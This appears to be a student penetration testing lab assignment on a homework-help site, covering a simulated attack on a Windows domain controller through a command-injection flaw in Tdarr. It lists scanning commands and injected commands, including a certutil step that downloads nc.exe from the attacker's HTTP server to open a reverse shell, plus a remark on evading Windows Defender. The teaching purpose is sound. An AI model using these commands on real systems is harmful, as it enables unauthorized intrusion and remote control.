User Account

All Pages

Simulate a real-life penetration testing

Assignment Help Other Subject
Reference no: EM133184211

Lab: Penetration Testing Lab

Introduction to the Lab
This is a penetration testing lab created to simulate a real-life penetration testing on a windows 2016 domain controller. This lab was customized specially for you using the detection Lab
This lab is divided into 6parts, and we would be following the Penetration testing phases.
1. Planning
2. Reconnaissance and Information Gathering
3. Enumeration and scanning
4. Attack/gaining access and Exploitation
5. Persistence
6. Analysis and reporting

Requirements
- Kali Linux
- Install Nessus on ubuntu/windows or any OS of your choice (optional) (get bonus of 2 marks for running Nessus credentialed scan on the target)
- (optional) Show another way to get reverse shell and get extra 2 marks bonus. We used netcat in this lab, show another way to earn bonus (either this or Nessus for the bonus mark)
- The vulnerable windows machine provided by instructor

Phases of a Penetration Test

Part 1: Planning
Rules of engagement document - We already have the rules of engagement for the client. See below
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Only the IP address assigned to your machine is in scope
- Rules of engagement completed
- Signing and Kickoff Call

Part 2: Reconnaissance and Information Gathering
1. Netdiscover - Netdiscover is a simple ARP scanner which can be used to scan for live hosts in a network
- Run netdiscover to discover all live hosts within our subnet
o Command: netdiscover -i eth0 (now we see all IP addresses within the subnet)

Part 3: Enumeration and scanning
In this phase, we will begin by running our scans. We would do this because this scan may take time depending on the vulnerabilities in the target host
1. Run Nessus and Nmap
• Please note Nessus is optional for your assignment

2. Nessus (optional)
• Nessus is a remote security scanning tool, which scans a computer and discovers any vulnerabilities
o Scan your target host

3. Nmap - Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses
• Run a nmap scan against the target. Make sure to scan all ports.
o Command - nmap -sV -sC -p- TargetIP

4. OSINT: We will do some opensource intelligence to know more about the discovered ports and services (Wait, lets run our Nessus scan first(optional))
• The web application we are researching on is Tdarr
Tdarr is a popular conditional transcoding application for processing large (or small) media libraries and the proof of concept for the exploitation was released on 10th of March 2022. I believe it is really cool to play with an exploit that was released just last week without a patch yet.
Lets do some more enumeration using some more tools
Nikto:Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems
• Command: nikto -h "IP address"
o E.g.nikto -h https://192.168.80.212:8266

5. Dirbuster
• Dirbuster is a tool used to brute-force URIs directories
o Command: dirbhttps://IPAddress:port (sometimes it may just have the default port 80 or 443)
E.gdirb https://192.168.80.218:8266

After the first 3 stages of our methodology, it's time to do some exploitation. Follow the demo fromin class to exploit the vulnerability or follow the steps in part 4.

Part 4: Attack/gaining access and Exploitation
Time to have some fun. Once the vulnerability has been detected during scanning and enumeration, we will try to see how to gain internal information about our victim by exploiting this vulnerability. Some information to gain after exploiting this vulnerability includes internal IP address, services running tohelp us exploit our target system.
Just as we did in class, interact with the internal host on the vulnerable application using its vulnerability. Make sure to take screenshots. You would need them for your reports.
Run the following
• --help&&ipconfig
• --help&&whoami
• --help&&ping 8.8.8.8 (let's see if our host can ping the internet)
• --help&&ping "YourkaliIP" (Try if your victim can ping your kali IP address)
Next step would be to try gain access into our target system through a remote code execution
In this demonstration, we would be using a tool called netcat. We would transfer netcat to our victim machine using another tool called certutil.
(Wehave to live off the land). Checkout a great resource later for tools Penetration testers use to live of the land "https://lolbas-project.github.io/"
1. Netcat:Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain access.
• Search for netcat on your kali using the command -locate nc.exe
• Make a copy of netcat to your present directory using the command -
o cp /usr/share/path/path/nc.exe .
o e.gcp /usr/share/windows-resources/binaries/nc.exe .

2. Python http server: Host a python http server on your kali linux to send your nc.exe binary into the victim machine.
Note: we would be sending this to the temp folder as windows defender would block and delete this in a regular folder. Sometimes windows defender blocks binaries dropped in the temp folder, as penetration testers, we can encode this using base 64 to trick windows defender. That is beyond the scope of this class.

• Command to host httpserver: python -m http.server 80
• Note: Run your http server in the same folder your netcat was copied into and leave it running while you open another command line tab in your kali VM
Now we are hosting our http server, we can run a command on our victim to download nc.exe to the victim's temp folder.
3. Certutil: This is a windows binary used for handling certificates, we would be using it to transfer files in this lab
• command to transfer a file (run this command on the vulnerable web application)

• --help&&certutil.exe -f -split -urlcachehttps://YourKaliIP/nc.exe C:\Windows\Temp\nc.exe
e.g. --help&&certutil.exe -f -split -urlcachehttps://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe
Note: make sure your http server is running where your nc.exe is saved, if your http server is not running or its not running where netcat is saved, you will be unable to download it.
You should get a success after running this command (make sure to take screenshot of the success, you would need it for your report)
4. Transfer confirmation: Confirm your nc.exe is sent to your victim machine by using the command. This would list the files in the temp folder
• --help&&dir C:\windows\Temp\
5. Remote code execution: Remote Code Execution or execution, also known as Arbitrary Code Execution, is a concept that describes a form of cyberattack in which the attacker can solely command the operation of another person's computing device or computer

6. Reverse shell
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

Part 5: Persistence
Remember we do not need to remain persistence because we are not attackers, we are ethical hackers/Penetration testers. We just want to show our client that we were able to breach their network and provide adequate evidence that this occurred

Part 6: Analysis and Reporting
Create a detailed report showing the steps you did in this penetration testing using the template provided by the instructor.
Your report should have the following sections
o Table of Content
o Purpose
o Scope
o Executive Summary (Remember, executive summaries are for executives and make sure this section isnon-technical)
o Technical details (This would include all your findings with screenshots for example screenshot of your nmap scan results, nikto results, proof of exploit on the vulnerable machine etc)
o Your report should include at least 20 screenshotsof your methodologies
o See sample reports provided by Instructoron DC Connect for guide

Attachment:- Penetration_Testing_Lab.rar

Reference no: EM133184211

Questions Cloud

Thoughts on eur-usd : What are your thoughts on EUR/USD this week with the current situations going on worldwide. illustrate how news events affect this specific currency's movements
Critically analyse and evaluate the impact of critical issue : Critically analyse and evaluate the impact of critical issues on business sustainability and develop appropriate responses to the challenges which the issues
Discuss issues and set forth and defend clear position : We now turn to the question of employee rights and employer obligations. Using at least two (2) of the foundational ethical theories , FOR EACH QUESTION , answe
Data exploration and insight generation assignment : Data Exploration and Insight Generation Assignment help and solution - What should be the strategy for replacing strange/out of bound values
Simulate a real-life penetration testing : Simulate a real-life penetration testing on a windows 2016 domain controller. This lab was customized specially for you using the detection Lab
Several types of home mortgages in the debt market : There are several types of home mortgages in the debt market. Briefly describe fixed and variable rate mortgages the focus on balloon-payment mortgage and discu
Explain the relationships between the variables : Question 1: "In an applied research context you do not need to explain the relationships between the variables in your conceptual model." Discuss this statement
Key components of the organizational strategic plan : What are the key components of the Organizational Strategic Plan that you see having the great impact on an organization? How did you arrive at those conclusion
Where could this come in handy during forensic investigation : Where could this come in handy during a forensic investigation - Navigate to the Software Hive, then go to Microsoft-->Windows NT -->CurrentVersion->NetworkList

Reviews

Write a Review

Other Subject Questions & Answers

  Cross-cultural opportunities and conflicts in canada

Short Paper on Cross-cultural Opportunities and Conflicts in Canada.

  Sociology theory questions

Sociology are very fundamental in nature. Role strain and role constraint speak about the duties and responsibilities of the roles of people in society or in a group. A short theory about Darwin and Moths is also answered.

  A book review on unfaithful angels

This review will help the reader understand the social work profession through different concepts giving the glimpse of why the social work profession might have drifted away from its original purpose of serving the poor.

  Disorder paper: schizophrenia

Schizophrenia does not really have just one single cause. It is a possibility that this disorder could be inherited but not all doctors are sure.

  Individual assignment: two models handout and rubric

Individual Assignment : Two Models Handout and Rubric,    This paper will allow you to understand and evaluate two vastly different organizational models and to effectively communicate their differences.

  Developing strategic intent for toyota

The following report includes the description about the organization, its strategies, industry analysis in which it operates and its position in the industry.

  Gasoline powered passenger vehicles

In this study, we examine how gasoline price volatility and income of the consumers impacts consumer's demand for gasoline.

  An aspect of poverty in canada

Economics thesis undergrad 4th year paper to write. it should be about 22 pages in length, literature review, economic analysis and then data or cost benefit analysis.

  Ngn customer satisfaction qos indicator for 3g services

The paper aims to highlight the global trends in countries and regions where 3G has already been introduced and propose an implementation plan to the telecom operators of developing countries.

  Prepare a power point presentation

Prepare the power point presentation for the case: Santa Fe Independent School District

  Information literacy is important in this environment

Information literacy is critically important in this contemporary environment

  Associative property of multiplication

Write a definition for associative property of multiplication.

Free Assignment Quote

Assured A++ Grade

Get guaranteed satisfaction & time on delivery in every assignment order you paid with us! We ensure premium quality solution document along with free turntin report!

Submit Assignment

Academics

Major Subjects

Majors

Get In Touch

whatsapp: +1-415-670-9521

Phone: +1-415-670-9521

Email: [email protected]

TERMS & POLICIES

HELP & SUPPORT

All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd